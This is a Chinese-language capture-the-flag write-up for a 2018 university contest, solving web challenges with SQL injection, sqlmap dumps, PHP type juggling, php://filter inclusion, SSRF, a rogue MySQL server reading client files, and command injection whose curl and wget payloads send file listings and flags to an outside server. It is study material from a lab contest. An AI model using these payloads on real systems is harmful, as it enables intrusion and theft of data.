标签 校赛 下的文章

2018网络安全校赛Web-WP

首先感谢一下出题人,有些题确实很好,嘿嘿。

WEB

黑曜石

修改UA头即可

网站后台

万能密码绕过,没有任何过滤

payload:

uname=1") Or 1 -- -
或者:  uname Or 1 #
密码随便填

也可以用sqlmap跑出来注意设置随机UA头(源码上会判断UA头)

py -2 sqlmap.py --random-agent -u "http://10.6.65.230:1011/index.php" --data="uname=1&passwd=2&submit=%E7%99%BB%E5%BD%95" --level 2

或者是
py -2 sqlmap.py -r C:\Users\徐超\Desktop\sql.txt --random-agent --level=2

直接跑出相应表中flag

E:\ctf工具\tools -cmd\sqlmapproject-sqlmap-1.1.10-33-g9ae713b\sqlmapproject-sqlmap-9ae713b>py -2 sqlmap.py -r C:\Users\徐超\Desktop\sql.txt --random-agent --level=2 -D sdutctf -T users --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.10.9#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:28:33

[22:28:33] [INFO] parsing HTTP request from 'C:\Users\徐超\Desktop\sql.txt'
[22:28:33] [INFO] fetched random HTTP User-Agent header from file 'E:\ctf工具\tools -cmd\sqlmapproject-sqlmap-1.1.10-33-g9ae713b\sqlmapproject-sqlmap-9ae713b\txt\user-agents.txt': 'Mozilla/6.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4'
[22:28:33] [INFO] resuming back-end DBMS 'mysql'
[22:28:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1") AND (SELECT * FROM (SELECT(SLEEP(5)))WOIJ) AND ("zmCd"="zmCd&passwd=2&submit=%E7%99%BB%E5%BD%95

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=1") UNION ALL SELECT NULL,CONCAT(0x71627a7671,0x78644b514a6950634376576e465142536279506566575466484565426672616c77675165724b4244,0x71766a6271)-- RQmS&passwd=2&submit=%E7%99%BB%E5%BD%95
---
[22:28:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[22:28:34] [INFO] fetching columns for table 'users' in database 'sdutctf'
[22:28:34] [INFO] the SQL query used returns 3 entries
[22:28:34] [INFO] retrieved: "id","int(2)"
[22:28:34] [INFO] retrieved: "username","varchar(255)"
[22:28:34] [INFO] retrieved: "password","varchar(255)"
[22:28:34] [INFO] fetching entries for table 'users' in database 'sdutctf'
[22:28:34] [INFO] the SQL query used returns 1 entries
[22:28:34] [INFO] analyzing table dump for possible password hashes
Database: sdutctf
Table: users
[1 entry]
+----+----------+--------------------------------------------+
| id | username | password                                   |
+----+----------+--------------------------------------------+
| 1  | admin    | SDUT2018{079bSyzFTHOk4cK8d30sDOfSbeEiKXUy} |
+----+----------+--------------------------------------------+

[22:28:34] [INFO] table 'sdutctf.users' dumped to CSV file 'C:\Users\徐超\.sqlmap\output\10.6.65.230\dump\sdutctf\users.csv'
[22:28:34] [INFO] fetched data logged to text files under 'C:\Users\徐超\.sqlmap\output\10.6.65.230'

[*] shutting down at 22:28:34

最后放上题目源代码:

<?php

//including the Mysql connect parameters.
include("sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
  $uname=$_POST['uname'];
  $passwd=$_POST['passwd'];

 


  // connectivity
  $uname='"'.$uname.'"';
  $passwd='"'.$passwd.'"'; 
  @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
  $result=mysql_query($sql);
  $row = mysql_fetch_array($result);

  if($row)
  {
      echo "<br>";
    echo '<p style="font-size:24pt;color:black;text-align:center">'.GREAT!!!. '<p>';
    echo '<p style="font-size:24pt;color:red;text-align:center">'. $row['password'].'<p>';
    echo "<br>";
    }
  else  
  {
    echo '<font color= "#0000ff" font size="3">';
    echo 'You login error!';
    //print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>"; 
    echo "</font>";  
  }
}

?>

密码是啥

php代码审计

 if (isset ($_GET['passwd'])) {
    
            if (@ereg ("^[a-zA-Z0-9]+$", $_GET['passwd']) === FALSE)
    
                echo '你的密码不正确';
    
            else if (strlen($_GET['passwd']) < 10 && $_GET['passwd'] > 8888888) {
    
                if (@strpos ($_GET['passwd'], '5o7') !== FALSE && @strpos ($_GET['password'], '---') !== FALSE)
    
                    require("flag.txt");
            }
    
    
            else
    
            echo 'Invalid password';
    
            }
        

出题人代码写错了吧……

payload

http://10.6.65.230:1000/index.php?passwd=1e95o7&password=---

flag隐藏了

php伪协议文件包含

payload:

http://10.6.65.230:1001/index.php?page=php://filter/convert.base64-encode/resource=Y45uZmln.php

flag更新时间90秒,手速快一点,多试几次…………

相等?

HTTP/1.1 200 OK
Server: nginx/1.4.6 (Ubuntu)
Date: Tue, 11 Dec 2018 19:51:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.9-1ubuntu4.25
Hint: username&password
Content-Length: 147

<p>Login first</p><br/><!--1. $name == $password--><br/><!--2. sha1($name) === sha($password)--><br/><!--3. die $flag--><br/><!-- fight ! --><br/>

查看res头有一个提示,很简单

payload:

GET /index.php?username[]=1a&password[]=1 HTTP/1.1
Host: 10.6.65.230:1002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

诡计

计算器

后端关键源代码

<?php
    echo $str." = ".shell_exec("echo \"$str\" | bc");
?>

把要计算的表达式以字符串形式传给bc,并返回计算结果

shell_exec()直接执行shell命令

可以看到没有任何过滤,服务器上nc监听好,尝试bash和nc反弹shell都失败,(出题人说docker限制了nc和bash的shell反弹)

现在只剩下curl、wget、ping 我们挨个尝试

ping

[root@instance-7e0k9b9j /]# ping `ls | base64 -w 0`.dl.ixuchao.cn
ping: YmluCmJvb3QKZGV2CmV0Ywpob21lCmxpYgpsaWI2NApsb3N0K2ZvdW5kCm1lZGlhCm1udApvcHQKcHJvYwpyb290CnJ1bgpzYmluCnNydgpzeXMKdG1wCnVzcgp2YXIK.dl.ixuchao.cn: Name or service not known

后面的域名是我自建的dns服务器,勉强相当于个dnslog吧。

前缀过长,本地测试失败,排除这种方法。

curl

服务器上用python开一个web服务器

python -m SimpleHTTPServer

因为回车符可能会截断输出,所以base64编码后用curl传输

payload

`curl http://106.12.150.166:8000/$(ls -l |base64 -w 0)`
-w 0 全部编码不分片

回显如下:

202.110.209.182 - - [11/Dec/2018 19:03:41] code 404, message File not found
202.110.209.182 - - [11/Dec/2018 19:03:41] "GET /dG90YWwgOAotci1zci1zci10IDEgcm9vdCByb290IDE3MDcgT2N0IDMwIDE0OjU2IGluZGV4LnBocAotcnctci0tci0tIDEgcm9vdCByb290ICAgNDIgRGVjIDEyIDAzOjAwIHRnbG5Jd1c2TWVPRmFqNEpHd01vVzhtWno0R2dMSFhsLnR4dAo= HTTP/1.1" 404 -
202.110.209.182 - - [11/Dec/2018 19:05:03] code 404, message File not found
202.110.209.182 - - [11/Dec/2018 19:05:03] "GET /U0RVVDIwMTh7UVRHSXl0b0hMUU9TQnJHZWdVSGxHd0JzOTlKT2F5THZ9 HTTP/1.1" 404 -

解码后:

root@iZj6c1wjgvrqav2931bx62Z:/home# echo dG90YWwgOAotci1zci1zci10IDEgcm9vdCByb290IDE3MDcgT2N0IDMwIDE0OjU2IGluZGV4LnBocAotcnctci0tci0tIDEgcm9vdCByb290ICAgNDIgRGVjIDEyIDAzOjAwIHRnbG5Jd1c2TWVPRmFqNEpHd01vVzhtWno0R2dMSFhsLnR4dAo= | base64 -d
total 8
-r-sr-sr-t 1 root root 1707 Oct 30 14:56 index.php
-rw-r--r-- 1 root root   42 Dec 12 03:00 tglnIwW6MeOFaj4JGwMoW8mZz4GgLHXl.txt
root@iZj6c1wjgvrqav2931bx62Z:/home# echo U0RVVDIwMTh7UVRHSXl0b0hMUU9TQnJHZWdVSGxHd0JzOTlKT2F5THZ9 | base64 decode
base64: decode: No such file or directory
root@iZj6c1wjgvrqav2931bx62Z:/home# echo U0RVVDIwMTh7UVRHSXl0b0hMUU9TQnJHZWdVSGxHd0JzOTlKT2F5THZ9 | base64 -d
SDUT2018{QTGIytoHLQOSBrGegUHlGwBs99JOayLv}root@iZj6c1wjgvrqav2931bx62Z:/home# 

wget

wget和上面curl一样,本地监听,payload如下:

`wget http://106.12.150.166:8000/$(ls -l |base64 -w 0)`
  • 写在最后:因为10秒钟一换flag,这里放出一个比较快的方法。
payload:
`curl http://106.12.150.166:80/ -X POST -d $(cat tglnIwW6MeOFaj4JGwMoW8mZz4GgLHXl.txt)`
注: 这里一定要POST传值,GET传值的话包含特殊符号'{'会自动丢弃。

nc监听:

[root@instance-7e0k9b9j ~]# nc -lvlk -p 80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 202.110.209.182.
Ncat: Connection from 202.110.209.182:33223.
POST / HTTP/1.1
User-Agent: curl/7.35.0
Host: 106.12.150.166
Accept: */*
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

SDUT2018{6LqX5IkhWLaKx66HnDLDVnJXLAfyrjZC}Ncat: Connection from 202.110.209.182.
Ncat: Connection from 202.110.209.182:39808.
POST / HTTP/1.1
User-Agent: curl/7.35.0
Host: 106.12.150.166
Accept: */*
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

拼手速

很简单一个题,考察python爬虫编写能力。

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/12/11 下午 09:08

import requests
import re
from bs4 import BeautifulSoup as bs

url = 'http://10.6.65.230:1005/index.php?'


res = requests.get(url=url)
html = res.text
soup = bs(html,'lxml')
flag = soup.button.string
print(flag)
headers = {
   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
   'Accept' : '*/*',
   'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
   'Cookie' : 'session=.eJwdj8FqwzAQBX-l7NkHK7JDMPTQ4lQ4sGsS5ITVzandSrLlQkNpqpB_r9rDXN5hmHeDfghugeqtny9jBm6ASmw2GSwfy-sI1Q0ezlAB-fcfjs2VVCON2rk_KL5Yo1GytzNqG9r6YLGeYnvqBOrDTKGJpMgb30njn0rSFFBRaBVK0lygPwYOLFs9p21forfB-KNlnzyr7crU-4IjX43qoglN3uqpoHqYyE_f5t-zcxifHUfj8LSVqaVkzY9wz-DrMn4ufUgHQKyFyMt8nYD7L3n3TQ4.DvG99A.X83b73vdue76lkT5DbcAaWXqN_k',
}


data = {
    'key':flag,
    'nonce':'682c214b7dbbdbb71ae37b8e18f84a0939e514e6b34ccf57f0953f0cf8c756825fbf799f8d928ff5ab4a3a6d48c61de3fb499847d690dcf8bb30bc6b1a7e39a6'
}


url1 = 'http://10.6.65.222/chal/22'
res = requests.post(url=url1,headers=headers,data=data)
print(res.text)

小蜘蛛

典型考察SSRF

右键源代码看到提示访问一下:

http://10.6.65.230:1006/admin/index.php

提示你不是公司员工,这道题类似的想到SSRF

还有在爬去自身http://localhost/admin/index.php时会提示网站标题 : 403 -- 请使用公司内部计算机名访问都会指向似乎是一个类似SSRF

爬取http://localhost/admin/index.php会显示MMP……

服务器nc监听一下80端口,使用网页爬虫去访问一下获取结果XFF头可以看到docker名为f954b1cb4035,宿主机是 10.6.65.230为dockers上一级代理

[root@instance-7e0k9b9j ~]# nc -lvkp 80
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 202.110.209.182.
Ncat: Connection from 202.110.209.182:64954.
GET / HTTP/1.0
Host: 106.12.150.166
X-Forwarded-For: f954b1cb4035, 10.6.65.230

直接用爬虫去爬取docker中的页面http://f954b1cb4035/admin/index.php找到flag

最后放上题目源码:

<!DOCTYPE html>
<html>
<head>
<?php
header('Content-Type:text/html; charset= utf-8');

function exceptions_error_handler($severity, $message, $filename, $lineno) {
    throw new ErrorException($message, 0, $severity, $filename, $lineno);
}
set_error_handler('exceptions_error_handler');
session_start();
$_SESSION['flag'] = '0';
include('include/extractTitleLogic.php');
if (isset($_POST['url'])){
    try {
        $dumpurl = parse_url($_POST['url']);
        $httpurl = "";
        if( !empty($dumpurl['scheme']) && !empty($dumpurl['host']) && ($dumpurl['scheme'] == 'http' || $dumpurl['scheme'] == 'https'))
        {
            if($dumpurl['host'] == '127.0.0.1')
                die('Kaka Say : MMP...');
            if( !empty($dumpurl['path']) && $dumpurl['path'] != '')
                $httpurl = ''.$dumpurl['scheme'].'://'.$dumpurl['host'].$dumpurl['path'];
            else
                $httpurl = ''.$dumpurl['scheme'].'://'.$dumpurl['host'].'/';
        }
        else{
            die('Kaka Say : MMP...');
        }
        $hdrs = array(
            'http' =>array('header' => "X-Forwarded-For: ".gethostname().", 10.6.65.230\r\n",
            "timeout"=>5,                             
            ),
        );
        $context = stream_context_create($hdrs);
        $cnt=0;   
        while($cnt<10 && ($content = file_get_contents($httpurl,false,$context))===FALSE) $cnt++;   
        $title =    get_title($content);    
    } catch (Exception $e) {
           echo "<center>抓取异常: " . $httpurl . "</center>";    
           exit();
}
    
}

?>

</head>
<body>
<center>
    <h1>Title 网页爬虫</h1>
    <form action='' method='POST'>
        <input placeholder='URL' name='url'>
        <input type='submit' value='获取网站Title'>
    </form>
 </br>
  <br>
<b>
             <?php
             if (isset($title)) {
                 echo is_array($title) ? '' : '网站标题 : '.htmlspecialchars($title, ENT_QUOTES).'</br></br>';    
             }else{
                 
                 if (isset($_SESSION['flag']) and $_SESSION['flag'] =='1') {
                     echo '没有Title标签,网页如下';
                 ?>
                         <br>
                        <br><br>
                         <div style="width: 691px; height: 464px;">
                             <?php //print htmlspecialchars($content, ENT_QUOTES); 
                                 print $content;    
                             ?>
                         </div><br><br>
                         <?php
                         
                     }    
             }
     ?>
 </b>
 <!-- /admin/index.php -->
</center>
</body>
</html>

爆破小工具

考察的很新颖,给出题人一个大大的赞。

考察点:LOAD DATA LOCAL INFILE功能来读取客户端文件。

具体参考:https://www.anquanke.com/post/id/106488

github地址:https://github.com/bettercap/bettercap

res 返回头中给出了flag的绝对路径Flag: /root/pXvA65B5F26sQPQKtg9EVMIfQW05EqkE.txt

使用kali下bettercap(apt install bettercap)搭建一个简易的mysql服务器,在客户端尝试链接该服务器时读取客户端的任意文件。

payload:

root@Archerx:~# bettercap -eval "set mysql.server.infile /root/pXvA65B5F26sQPQKtg9EVMIfQW05EqkE.txt; mysql.server on"
bettercap v2.11 (type 'help' for a list of commands)

10.6.65.0/24 > 10.6.65.44  » [19:56:10] [sys.log] [inf] [mysql.server] read file ( /root/pXvA65B5F26sQPQKtg9EVMIfQW05EqkE.txt ) is 41 bytes
10.6.65.0/24 > 10.6.65.44  » [19:56:10] [sys.log] [inf] 
SDUT2018{xSbXZdPV0LQDAeAwnAXD59U8lGpYnLaw}

右键源代码如下:


        $text = $_GET["text"];  
        $file = $_GET["file"];  
        $result = $_GET["answer"];  
    
        if(isset($text)&&(file_get_contents($text,\'r\')==="The first step")){  
            echo "hello admin!<br>";  
        include($file); //try to get all the code of tishi.php 
        }else{  
            echo "you are not admin ! ";  
        }  

        didi: __tostring() 
                
        -->

kaka的php

考察:

  • php伪协议
  • php反序列化

bugku上一道非常类似的题,构造如下:

其实所有题解想写一起的,想想又太长了,还是分开写吧。

preView